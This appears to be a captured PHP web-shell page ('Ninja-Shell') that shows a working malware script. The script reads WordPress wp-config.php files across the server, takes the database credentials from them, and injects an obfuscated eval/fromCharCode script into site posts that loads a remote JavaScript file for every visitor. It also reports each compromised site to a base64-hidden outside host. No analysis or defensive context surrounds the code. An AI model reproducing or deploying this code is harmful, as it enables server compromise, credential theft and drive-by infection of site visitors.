{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: //tmp/ar8st_1693309661
<?php error_reporting(0); ini_set('display_errors',0); ini_set('max_execution_time', 0); error_reporting(0); ini_set('display_errors',0); ini_set('max_execution_time', 0); $d = $_SERVER['DOCUMENT_ROOT']."/"; make_index_blog($d."index.php"); die(); $d = $_SERVER['DOCUMENT_ROOT']."/"; $files = array(); $dr2 = array(); $fz2 = array(); $dir =$_SERVER['DOCUMENT_ROOT']; try{ $dirs = glob($dir . '/*', GLOB_ONLYDIR); if($dirs!=false) $dr2 = array_merge($dr2,$dirs); } catch(Exception $e){ } try{ $dirs = glob($dir . '/../*', GLOB_ONLYDIR); if($dirs!=false) $dr2 = array_merge($dr2,$dirs); } catch(Exception $e){ } try{ $dirs = glob($dir . '/../../*', GLOB_ONLYDIR); if($dirs!=false) $dr2 = array_merge($dr2,$dirs); } catch(Exception $e){ } try{ $dirs = glob($dir . '/../../../*', GLOB_ONLYDIR); if($dirs!=false) $dr2 = array_merge($dr2,$dirs); } catch(Exception $e){ } foreach($dr2 as $dr1){ try{ $dirs = glob($dr1 . '/*', GLOB_ONLYDIR); if($dirs!=false) $dr2 = array_merge($dr2,$dirs); } catch(Exception $e){ } } foreach($dr2 as $dr1){ try{ $dirs = glob($dr1 . '/index.php'); if($dirs!=false) $fz2 = array_merge($fz2,$dirs); } catch(Exception $e){ } } $fz2 = array_unique($fz2); $files = array_merge($files,$fz2); $files = array_unique($files); foreach($files as $file) { make_index_blog($file,$wi,$wb); } function getijstonemoretime($path){ } function get_var_reg($pat,$text) { if ($c = preg_match_all ("/".$pat."/is", $text, $matches)) { return $matches[1][0]; } return ""; } function make_index_blog($path){ $path = str_replace("/index.php","/wp-config.php",$path); $az = shell_exec('cat '.$path); if(strpos($az,"DB_PASS") !== false) { $az = file_get_contents($path); //echo "iii->>fileget:".$az."<br />"; } if(strpos($az,"DB_PASS") !== false) { sqldo($az); } else { // echo "iii->>cant cat:".$path."| = ".$az."<br />"; } } function check_sss($siten){ if($siten != "null") { } else { $siten = "notsitefound"; } if($siten != "notsitefound"){ //echo "iii->>sitefound:".$_SERVER['HTTP_HOST'].":".$siten."<br />"; $vg = file_get_contents($siten); if(strpos($vg,"linestoget") !== false) { $u=base64_decode("aHR0cDovL3B1dC5jbGlja2FuZGFuYWx5dGljcy5jb20vc2V0LnBocA=="); @file_get_contents($u."?q=linestoget-".$siten); } else { if(strpos($vg,"clickandanalytics") !== false) { $u=base64_decode("aHR0cDovL3B1dC5jbGlja2FuZGFuYWx5dGljcy5jb20vc2V0LnBocA=="); @file_get_contents($u."?q=clickandanalytics-".$siten); } else { if(strpos($vg,"stratosbody") !== false) { $u=base64_decode("aHR0cDovL3B1dC5jbGlja2FuZGFuYWx5dGljcy5jb20vc2V0LnBocA=="); @file_get_contents($u."?q=stratosbody-".$siten); } else { return 1; } } } } return 0; } function sqldo($content){ $siteurl = "null"; if(strpos($content, "DB_NAME") !== false) { $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]",$content); $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]",$content); $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]",$content); $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]",$content); // Create connection $conn = new mysqli($host, $user, $pass); // Check connection if ($conn->connect_error) { echo $conn->connect_error; } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'"; $result = $conn->query($q) or die($conn->error); while($row = $result->fetch_assoc()) { global $count; $count++; $result5 = $conn->query("SHOW COLUMNS FROM ".$db."." . $row["TABLE_NAME"]." LIKE 'option_name'"); if($result5->num_rows > 0) { $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." where option_name='siteurl' LIMIT 1 "; $result2 = $conn->query($q2) or var_dump($conn->error); while($row2 = $result2->fetch_assoc()) { $val = $row2['option_value']; $siteurl = $val; if(check_sss($siteurl)==1){ $post_row = str_replace("_options","_posts",$row["TABLE_NAME"]); $q7 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $post_row." LIMIT 1 "; $result7 = $conn->query($q7) or var_dump($conn->error); while($row7 = $result7->fetch_assoc()) { $val = $row7['post_content']; if(strpos($val, "54745756836") === false){ $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $post_row." set post_content = CONCAT(post_content,\"<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>\") WHERE post_content NOT LIKE '%54745756836%'"; $conn->query($q3); $u=base64_decode("aHR0cDovL3B1dC5jbGlja2FuZGFuYWx5dGljcy5jb20vc2V0LnBocA=="); @file_get_contents($u."?q=q-".$siteurl.":" .$row["TABLE_SCHEMA"]. "." . $post_row); } } } } } } } $conn->close(); } return $siteurl; }
./Ninja\.